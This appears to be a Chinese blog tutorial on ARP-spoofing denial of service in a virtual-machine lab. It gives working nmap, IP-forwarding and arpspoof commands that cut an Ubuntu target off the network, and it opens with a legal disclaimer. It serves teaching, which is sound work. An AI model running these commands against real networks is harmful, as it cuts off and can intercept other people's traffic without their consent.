【网络安全】MITM攻击:局域网内设备断网

0.前言

本文仅供交流学习,请遵守《网络安全法》,并承诺:

1、未经允许,不得进入计算机信息网络或者使用计算机信息网络资源;

 2、未经允许,不得对计算机信息网络功能进行删除、修改或者增加;

  3、未经允许,不得对计算机信息网络中存储或者传输的数据和应用程序进行删除、修改或者增加;

  4、不得故意制作、传播计算机病毒以及其它破坏性程序;

  5、不盗用别人计算机的ip地址、网卡物理地址(mac值)和信息数据;6、不做其它危害计算机信息网络安全行为。

1.原理

Arp欺骗(中间人攻击):攻击时Kali复制路由器MAC地址,假冒路由器截取靶机数据。同理伪装客户端欺骗路由器。

2.过程

靶机:Ubuntu

攻击者:Kali

首先,使用nmap扫描目标网段,查看靶机ip地址。

nmap 192.168.110.1-255 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-09-17 11:46 CST
Nmap scan report for 192.168.110.2 (192.168.110.2)
Host is up (0.0039s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.00090s latency).
All 1000 scanned ports on 192.168.110.129 (192.168.110.129) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.110.130 (192.168.110.130)
Host is up (0.0075s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp

Nmap done: 255 IP addresses (3 hosts up) scanned in 4.17 seconds

网段:同一网段指的是IP地址和子网掩码相与得到相同的网络地址。想在同一网段,必需做到网络标识相同。

获得目标的ip地址: 192.168.110.2和192.168.110.130(129为kali)。

接着阻止路由器和客户机相互转发包裹。

echo 0 > /proc/sys/net/ipv4/ip_forward

最后即可进行攻击,两者间通信会经过kali机。

arpspoof -i eth0 -t 192.168.110.130 -r 192.168.110.2

-i 为指定网卡

-t指定打击(欺骗)设备的IP
-r 指定打击路由的IP
ctrl_c 停止攻击

 4.查验成果

虚拟机Ubuntu无法上网, 退出arp指令行后网络恢复。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值